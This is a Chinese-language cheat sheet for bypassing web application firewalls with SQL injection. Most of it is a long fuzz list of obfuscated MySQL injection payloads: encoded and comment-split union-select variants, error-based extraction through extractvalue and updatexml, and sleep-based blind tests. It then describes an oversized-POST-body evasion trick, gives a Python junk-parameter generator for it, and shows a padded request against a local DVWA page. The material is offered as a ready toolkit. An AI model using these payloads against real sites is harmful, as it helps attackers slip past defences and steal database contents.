​注入waf字典fuzz

​如果目标站点支持https尽量用https进行突破。

注入bypass fuzz waf  


'
--
' order/*/*/by/**/1--+
' order/**/by 1 --+
!
"
"%20and%20"1"="1
"%20and%20"1"="2
"%20OR%20"1"="1
"%20OR%20"1"="2
#
%
%'%20and%201=1%20and%20'%'='
%'%20and%201=2%20and%20'%'='x
%')%20and%201=1%20and%20('%'='
%')%20and%201=2%20and%20('%'='x
%09union%09select 1,2
%0a
%0A%20
%0aunion%0aselect 1,2
%0b
%0baunion%0bselect 1,2
%0c
%0caunion%0cselect 1,2
%0d
%0d%0aunion%0d%0aselect 1,2
%0daunion%0dselect 1,2
--%0dunion select
%20
'%20and%20'1'='1
'%20and%20'1'='2
'%20OR%20'1'='1
'%20OR%201=1--%20-
'%20OR%20'1'='2
'%20OR%201=2--%20-
%22
%23
%23%0afrom
%23?%0auion%20?%23?%0aselect
%23?%0auion%20?%23?%0aselect   
%23?zen?%0Aunion all%23zen%0A%23Zen%0Aselect
%23?zen?%0Aunion all%23zen%0A%23Zen%0Aselect   
%23x%0A/*!database*/()
%25%37%35%25%36%45%25%36%39%25%36%46%25%36%45%25%32%30%25%37%33%25%36%35%25%36%43%25%36%35%25%36%33%25%37%34
%250aunion%250aselect 1,2
%252f%252a*/union%252f%252a /select%252f%252a*/
%252f%252a*/union%252f%252a /select%252f%252a*/ 
%26 1=1
%26 1=2
%26 hex(0)
%26 hex(1)
%27
%2d%2d%0afrom
%2d%2d%0from
%2f**%2funion%2f**%2fselect
%2f**%2funion%2f**%2fselect 
%2f**%2funion%2f**%2fselect%2f**%2f
%2f**%2funion%2f**%2fselect%2f**%2f 
%53eLEct
%55nion %53eLEct
%55nion %53eLEct   
%55nion(%53elect 1,2,3)-- -
%55nion(%53elect 1,2,3)-- - 
%55nion(%53elect)
%75%6e%6f%69%6e %61%6c%6c %73%65%6c%65%63%7
%a0
%a0from
%df
%u0066rom
&
&&
&& 1=1
&& 1=2
(
(information_schema.schemata)
(select 1)=(select 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA)/*!union*/
)
)%20and%20(1=1
')%20and%20('1'='1
)%20and%20(1=2
')%20and%20('1'='2
)%20OR%20(1=1
')%20OR%20('1'='1
)%20OR%20(1=2
')%20OR%20('1'='2
)%20OR%201=1--%20-
')%20OR%201=1--%20-
)%20OR%201=2--%20-
')%20OR%201=2--%20-
*
*/*
*9e0UnIoN
*9e0UnIoN*9e0slect
,
.
/
/%23A%0a/
/%2A%2A/union/%2A%2A/select/%2A%2A/
/&id=1308%20order%20by%2035&b=/
/*
/* */union/* */select/ */1,2;
/*!%23/*%0afrom*/
/*!%53eLEct*/
/*!%55NiOn*/ /*!%53eLEct*/
/*!%55NiOn*/ /*!%53eLEct*/ 
/*!00000%23/*%0afrom*/
/*!10440union%0aselect*/
/*!11440updatexml*/(1,1,1)
/*!11441extractvalue*/(1, concat(0x5c, (SELECT @@version)))
/*!12345union*//*!12345select*/1,2;
/*!40000union*//*!40000select*/1,2
/*!50000UniON SeLeCt*/
/*!50000UniON SeLeCt*/ 
/*!50000union*//*!50000select*/1,2
/*!5000updatexml*/(1,1,1)
/*!from*/
/*!select*/
/*!u%6eion*/ /*!se%6cect*/
/*!u%6eion*/ /*!se%6cect*/ 
/*!uNIOn*/ /*!SelECt*/
/*!uNIOn*/ /*!SelECt*/ 
/*!union*//*!00000all*//*!00000select*/1,2
/*!union*//*!select*/1,2
/*!union*/+/*!select*/
/*!union*/+/*!select*/ 
/*!UnIoN*/SeLecT+
/*!UnIoN*/SeLecT+  
/**/
/**//*!12345UNION SELECT*//**/
/**//*!12345UNION SELECT*//**/ 
/**//*!50000UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/ 
/**//*!union*//**//*!select*//**/
/**//*!union*//**//*!select*//**/ 
/**/UNION/**//*!50000SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/ 
/**/union/**/select/**/
/*--*/union/*--*/select/*--*/
/**/union/**/select/**/ 
/*--*/union/*--*/select/*--*/ 
/**_**/UnIoN(/*!50000SeLeCt*/
/*xxx*/()
/*中文*/union/*中文*/select/*中文*/1,2;
//
//*
;
@
@;
\'
\\
\Nfrom
\Nselect
\Nunion
^
`
`information_schema`.`schemata`
`information_schema`.schemata
`updatexml`(1,(select @@version),1)
`users`
|
||
|| 1=0
|| 1=1
'||1=geometryCollection(updatexml(1,concat(0x7e,database(),0x7e),1))--+
~
-~
+
--+
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt 
+#uNiOn+#sEleCt
+#uNiOn+#sEleCt 
--+%0d%0aunion--+%0d%0aselect--+%0d%0a1,--+%0d%0a2
+or+0x3a!=1--+
+or+0x3a=1--+
+un/**/ion+se/**/lect
+un/**/ion+se/**/lect 
+uni%0bon+se%0blect+
+uni%0bon+se%0blect+ 
+UnIOn%0d%0aSeleCt%0d%0a
+UnIOn%0d%0aSeleCt%0d%0a 
+union+distinct+select+
+union+distinct+select+ 
+union+distinctROW+select+
+union+distinctROW+select+ 
+UNunionION+SEselectLECT+
+UNunionION+SEselectLECT+ 
<
<>
=
>
1' order--%0aby--%0a1--%0a--+
'1'='1
1efrom
2.0 from
8e0from
ADD
admin'
admin.users
admin+.user
all
alter
anandd
AND
and (select 1)=(Select 0x1)
and (select 1)=(Select 0xA*1000)
and ~1>1
and 1=1
and -1=-1
and 1=2
and -2<-1
and exp(~(select * from(select user())x));--+
and exp(~(select%23%0apassword%23%0afrom(select%23%0auser())x));--+
'and extractvalue/*/676*/(1,concat(0x7e,database/*/387*/(),x07e))--+
and hex()
and hex(1)>~1
and hex(1)>-1
and true=true --+
and!!!!1=1
and!!!!if((substr((select hex(user/**/(/*!*/))),1,1)>1),sleep/**/(/*!5*/),1)
and%201=1
and%201=2
and(select 1)=(Select 0xA*1000)/*!uNIOn*//*!SeLECt*/ 1,user()
and/*@%$^(*/ 1=1
and+0x3a!=info()--
as
ascii
Ascii(1)
ASSIC
atan()
BEFORE
benchmark
benchmark()
bin
BY
case
CAST
CAST()
ceil()
ceiling()
char
CHAR(102, 114, 111, 109)
Char(49)
Char('97')
col_name()
COLUMN
CONCAT
concat()
concat(version(),'|',user());
concat_ws
concat_ws()
concat_ws('|',1,2,3)
convert()
COUNT
CREATE
CURSOR
database
database /*//--/*/ ()
database%23x%0A()
database()
database()||’
database/*!20553()*/
database/*!20553()*/--+
database/**/()
database/*///-*/()
database/*/11111*/()
database/*xxx*/()
database+()
DATABASES
db_name()
delete
drop
e0FrOm
e0union(select!1,)
e0union(select(1),(select user from user limit 1)
e0union(select(1),)
e0union(select/!50000/1,)
e0union(select@'id',)
e0union(select{1},)
e0union(select~1,)
e0union(select+1,)
e0union(select'1',(select user from user limit 1)
e0union(select'1',)
e0union(select-1,)
else
END
exec
exp()
extracavalue()
extractvalue
floor
floor()
for
format
FrOFrOmm
FrOm
from/*!%23/*%0ainformation_schema.tables*/
from/*!--+/*%0ainformation_schema.columns*/
from/*!--+/*%0ainformation_schema.tables*/
from/*!information_schema.tables*/
GeometryCollection
greatest()
GROUP
group by 1
group_concat
handler
HAS_DBACCESS()
having
hex
Hex('a')
hex(user/**/(/**/))
id =1' and 1=1 --+
id =1' and 1=2 --+
id =1' or '1'='1
id=1' || '1'='1
id=-1' like "[%23]" /*!10440union select*/ 1,2,3 --+
id=1' or 1=1#
IF
in
INFILE
INFORMATION
Information_schema./**_**/Tables
information_schema.`schemata`
information_schema.tables
information_schema/**/.schemata
infromation_schema
insert
inset
instr
INTO
into @a,@b,@c,@d;
IS_MEMBER()
IS_SRVROLEMEMBER()
JOIN
LEAVE
left
Left(@@version,1)
Left(version(),1)
Length
LEVEL
like
like "[%23]" /*!10440union select*/
like["%23"]
LIMIT
limit 1 offset 0
Lpad(version(),1,1)
mid
mid()substring()
mid(version() from 1 for 1)
Mid(version(),1,1)
MultiLineString
MultiPoint
NAMES
NEXT
NULL
null+UNION+SELECT+1,2
object_id()
OF
ON
oorr
OR
or 1=0
or 1=1
OR%201=1
OR%201=2
ORD
order
order /*//--/*/ by
order aby
order by
order by 1
order--%0aby
Order%A0By
order/**/by
order/*--*/by
order/*//*/by
order/**/by
OUTFILE
Polygon
prepare
procedure analyse()
rand()
REGEXP
RENAME
REPLACE
REVERSE
REVERSE(noinu)+REVERSE(tceles)
REVERSE(noinu)+REVERSE(tceles) 
reverse(right(reverse(version()),1)
right
Right(@@version,1)
RLIKE
Rpad(version(),1,1)
s%u0065lect
s%u006c%u0006ect
s%u00f0lect
SCHEMA
se%0blect
sel%e%ct
sele%ct
sele/**/ct
SeleCt
select * from user where username in('user');
select * from user where username like 'user';
select * from user where username='user';
select union select{x 1},
select(1)from
select{x user}from{x mysql.user};
SEPARATOR
SET
SHOW
sign()
sleep
sleep()
SQL
sqrt()
substr()
Substr(version(),1,1)
substring
Substring(@@version,1,1)
Substring(version(),1,1)
sys schemma
sys.schema_table_statistics_with_buffer
TABLE
TABLE_SCHEMA
tan()
THEN
TRUE
u%6eion s%65lect
u%6eion se%6cect
u%6eion se%6cect   
un?+un/**/ion+se/**/lect+
Unhex(61)
uni%0bon+se%0blect
uni%0bon+se%0blect 
uni%6fn distinct%52OW s%65lect
uni%u006fn sel%u0065ct
unio%6e %73elect
unio%6e %73elect   
unio%6e%20%64istinc%74%20%73elect
unio%6e%20%64istinc%74%20%73elect   
UNioN
union   /*!00000%23%0aselect*/
union  -- 1%0a select
union  -- hex()%0a select
union %23%0aall select
union (/*!/**/ SeleCT */ 1,2,3)
union (/*!/**/ SeleCT */ 1,2,3) 
union (select)
union /*!50000%53elect*/
union /*!50000%53elect*/ 
union /*//--/*/ select
union /*@%$^(*/ select 
union /*@%$^(*/ select --+
union all %u0053elect
union all select
union all select 1,2
union all%23%0a select
union distinct
union DISTINCT select
union DISTINCT select 1,2
union distinctrow
UnIoN SeLeCt
union select * from (select 1)a join (select 2)b join(select user())c join(select 4)d******;
union select 1,(select(schema_name)from(information_schema.SCHEMATA)limit 0,1)
union select 1,(select(schema_name)from/*!12345information_schema.SCHEMATA*/limit 0,1)
union select 1,(select(schema_name)from{x information_schema.SCHEMATA}limit 0,1)
uNIoN sELecT 1,2
union select all
union select DISTINCT
union%20%64istinctRO%57%20select
union%20%64istinctRO%57%20select   
union%20/*!44509select*/%20
union%2053elect
union%2053elect   
union%20all%23%0a%20select%20
union%20distinct%20select
union%20distinct%20select   
union%20select%20
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A 
union%250Cselect
union%25A0select
union%a0%0aselect 1,'2',
union%a0%0aselect 1,'2','3',
union(select%0aall{x users}from{x ddd})
union(select%0adistinct{x users}from{x ddd})
union(select%0adistinctrow{x users}from{x ddd})
union/*!23000select*/
union/*%00*/%23a%0A/*!/*!select
union/*%00*/%23a%0A/*!/*!select%20
union/*%0a%0b%20%a0--*/select
UNION/*&test=1*/SELECT/*&pwn=2*/
UNION/*&test=1*/SELECT/*&pwn=2*/ 
union/*&username=*/select
union/**/select
union/**/select/**/1,2
union/*/!*!**/select
union/*/!--**/select
UNION/*/%21*%21**/SELECT
union/*/-*!!*/select
union/*//--**/select
union/*//\\\*/select+1,2--+
union/*//--\\\*/select+1,2--+
UNiOn/*/1/*/select
union/aaaa%01bbs/select
union/aaaaaaaaaaaaaaaaaaaaaaa/select
union/aaaaaaaaaaaaaaaaaaaaaaaaaaaa/select
UNiOn--+%02%0d%0aselect    
union+/*!select*/
union+/*!select*/ 
union+distinctROW+select
UNIunionONSeLselectECT
ununionion selselectect
UPDATE
updatexml
updatexml()
user
user()
user/**/()--+
users
USING
VALUE
VALUES
VARCHAR
VERSION
when
WHERE
xor

绕过方式1:超大数据包绕过(mysql)
假如HTTP请求POST BODY太大,检测所有内容,WAF集群消耗太多的CPU、内存资源。因此许多WAF只检测前面的2M或4M的内容。对于攻击者而言,只需要在POST BODY前面添加许多无用的数据,把攻击的payload放在最后即可绕过WAF检测。
绕过技巧:•GET型请求转POST型•Content-Length头长度大于8200•正常参数在脏数据后面,否则无效

zangshuju.py

#coding=utf-8
import random,string
import sys
from urllib import parse

# Bounds for the generated parameter-name and value lengths (inclusive,
# drawn with random.randint in main()) and the pair-count range; the upper
# count is taken from the first command-line argument and is required.
varname_min, varname_max = 5, 15
data_min, data_max = 20, 30
num_min, num_max = 1, int(sys.argv[1])
def randstr(length):
    """Return a string of ``length`` characters drawn uniformly from ASCII letters.

    Each character is an independent ``random.choice`` over
    ``string.ascii_letters``; ``length`` of 0 yields the empty string.
    """
    return ''.join(random.choice(string.ascii_letters) for _ in range(length))

def main():
    """Print one urlencoded run of random key/value pairs wrapped in ``&``.

    Builds ``num_max - num_min`` pairs (half-open range; colliding random
    keys overwrite each other, so the printed count can be lower) with key
    lengths in [varname_min, varname_max] and value lengths in
    [data_min, data_max], then prints ``'&' + urlencode(pairs) + '&'``.
    """
    filler = {}
    for _ in range(num_min, num_max):
        # The original item assignment evaluates the value before the key;
        # keep that order so the random draws happen in the same sequence.
        value = randstr(random.randint(data_min, data_max))
        key = randstr(random.randint(varname_min, varname_max))
        filler[key] = value
    print('&' + parse.urlencode(filler) + '&')

main()  # runs on import as well as on execution: there is no __name__ guard

POST /dvwa/vulnerabilities/sqli/?Submit=Submit HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 8200
Origin: http://localhost
Connection: close
Referer: http://localhost/dvwa/vulnerabilities/sqli/?Submit=Submit
Cookie: security=low; ECS[visit_times]=1; PHPSESSID=90a4331de18bcd32ee2d780254f44589
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin

a=/*AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCCCCCCCCCDDDDDBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBCCCSSSSSSSSSSSSSSSSSSSSSSSSSSSAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBB